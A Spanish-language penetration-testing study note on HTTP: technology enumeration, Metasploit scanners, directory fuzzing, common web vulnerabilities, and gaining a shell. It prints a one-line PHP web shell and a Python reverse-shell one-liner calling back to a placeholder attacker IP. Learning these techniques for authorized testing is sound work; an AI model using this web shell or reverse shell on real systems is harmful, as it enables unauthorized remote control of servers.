Skip to content

🌐 HTTP (Hypertext Transfer Protocol)

El protocolo HTTP (puertos 80, 443, 8080) es probablemente la superficie de ataque más extensa en cualquier auditoría. A menudo, una mala configuración en el servidor web o una aplicación desactualizada son la puerta de entrada para obtener una shell inicial.


🔍 Enumeración Web

La fase de enumeración busca identificar qué tecnologías corren en el servidor y encontrar directorios o archivos que no deberían ser públicos (backups, paneles de administración, archivos de configuración).

1. Identificación de Tecnologías

Antes de atacar, debemos saber qué hay detrás.

  • Wappalyzer: Extensión de navegador esencial para identificar CMS, lenguajes y servidores.
  • WhatWeb: Herramienta de terminal para identificar el "stack" tecnológico.
bash
whatweb http://<IP>

2. Automatización con Metasploit

Metasploit ofrece escáneres auxiliares muy potentes para agilizar el reconocimiento:

  • Versión y Cabeceras: auxiliary/scanner/http/http_version y http_header. Permiten identificar el servidor (Apache, Nginx, IIS) y posibles protecciones.

  • Robots.txt: auxiliary/scanner/http/robots_txt. Busca automáticamente este archivo para ver qué directorios el administrador intenta ocultar de los buscadores.

  • Fuerza Bruta de Directorios y Archivos:

  • auxiliary/scanner/http/dir_scanner (Directorios).

  • auxiliary/scanner/http/files_dir (Archivos específicos).

  • Enumeración de Usuarios: auxiliary/scanner/http/apache_userdir_enum (Específico para Apache).

3. Fuzzing y Diccionarios (Fuera de MSF)

Aunque Metasploit tiene módulos, herramientas como Dirsearch, Gobuster o FFUF suelen ser más rápidas para descubrir contenido oculto.


🚀 Explotación

Una vez identificada la tecnología y los puntos de entrada, la explotación suele dividirse en dos grandes grupos:

A. Vulnerabilidades del Servidor (Software)

Se basan en fallos del propio servidor web (Apache, IIS) o de sus componentes (PHP, Python).

  • CVEs Específicos: Si encuentras una versión antigua (ej: Shellshock en CGI o MS15-034 en IIS), busca el exploit correspondiente en Metasploit.
  • WebDAV: Si el método PUT está habilitado, puedes subir una WebShell directamente:
bash
# Usando el módulo de Metasploit
use exploit/windows/http/iis_webdav_upload_asp

B. Vulnerabilidades de la Aplicación (Lógica/Código)

Son fallos en el código de la web que permiten interactuar con el servidor.

  • Carga de Archivos (File Upload): Subir un archivo .php o .aspx malicioso para obtener una reverse shell.
  • LFI/RFI (File Inclusion): Leer archivos del sistema (como /etc/passwd) o ejecutar código remoto.
  • SQL Injection (SQLi): Extraer la base de datos o, en algunos casos, obtener ejecución de comandos (RCE) mediante xp_cmdshell en MSSQL.

🚪 WebShells y el salto a la Shell

Si logras subir un archivo malicioso, el siguiente paso es ejecutar comandos.

  1. Subes cmd.php (ejemplo: <?php system($_GET['cmd']); ?>).
  2. Accedes vía navegador: http://<IP>/cmd.php?cmd=whoami.
  3. Estableces una Reverse Shell para salir del navegador y tener una terminal real:
bash
# Payload para la URL
python3 -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<TU_IP>",<PORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/bash")'

Sin copyright ni nada. Ház lo que quieras con todo esto.